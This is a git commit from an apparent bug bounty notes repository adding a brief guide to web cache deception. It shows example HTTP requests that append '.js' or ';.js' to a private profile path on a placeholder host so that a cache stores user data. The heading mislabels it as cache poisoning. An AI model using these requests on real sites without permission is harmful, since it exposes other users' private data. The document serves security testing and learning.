mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-22 20:36:10 +00:00
Added Web Cache Deception
This commit is contained in:
parent
bc5cae8274
commit
bb8f0e7b1e
52
Web Cache Deception.md
Normal file
52
Web Cache Deception.md
Normal file
@ -0,0 +1,52 @@
|
|||||||
|
# Web Cache Poisoning
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
Web Cache Deception is an attack in which an attacker deceives a caching proxy into improperly storing private information sent over the internet and gaining unauthorized access to that cached data
|
||||||
|
|
||||||
|
## Where to find
|
||||||
|
`-`
|
||||||
|
|
||||||
|
## How to exploit
|
||||||
|
* Normal Request
|
||||||
|
```
|
||||||
|
GET /profile/setting HTTP/1.1
|
||||||
|
Host: www.vuln.com
|
||||||
|
```
|
||||||
|
The response is
|
||||||
|
```
|
||||||
|
HTTP/2 200 OK
|
||||||
|
Content-Type: text/html
|
||||||
|
Cf-Cache-Status: HIT
|
||||||
|
...
|
||||||
|
```
|
||||||
|
|
||||||
|
1. Try to add cacheable extension (For example .js / .css / .jpg, etc.)
|
||||||
|
```
|
||||||
|
GET /profile/setting/.js HTTP/1.1
|
||||||
|
Host: www.vuln.com
|
||||||
|
```
|
||||||
|
The response is
|
||||||
|
```
|
||||||
|
HTTP/2 200 OK
|
||||||
|
Content-Type: text/html
|
||||||
|
Cf-Cache-Status: HIT
|
||||||
|
...
|
||||||
|
```
|
||||||
|
If the response is success, try to open the url in the incognito mode.
|
||||||
|
|
||||||
|
2. Add `;` before the extension (For example `;.js` / `;.css` / `;.jpg`, etc.)
|
||||||
|
```
|
||||||
|
GET /profile/setting/;.js HTTP/1.1
|
||||||
|
Host: www.vuln.com
|
||||||
|
```
|
||||||
|
The response is
|
||||||
|
```
|
||||||
|
HTTP/2 200 OK
|
||||||
|
Content-Type: text/html
|
||||||
|
Cf-Cache-Status: HIT
|
||||||
|
...
|
||||||
|
```
|
||||||
|
If the response is success, try to open the url in the incognito mode.
|
||||||
|
|
||||||
|
## References
|
||||||
|
* [@bxmbn](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
|
Loading…
Reference in New Issue
Block a user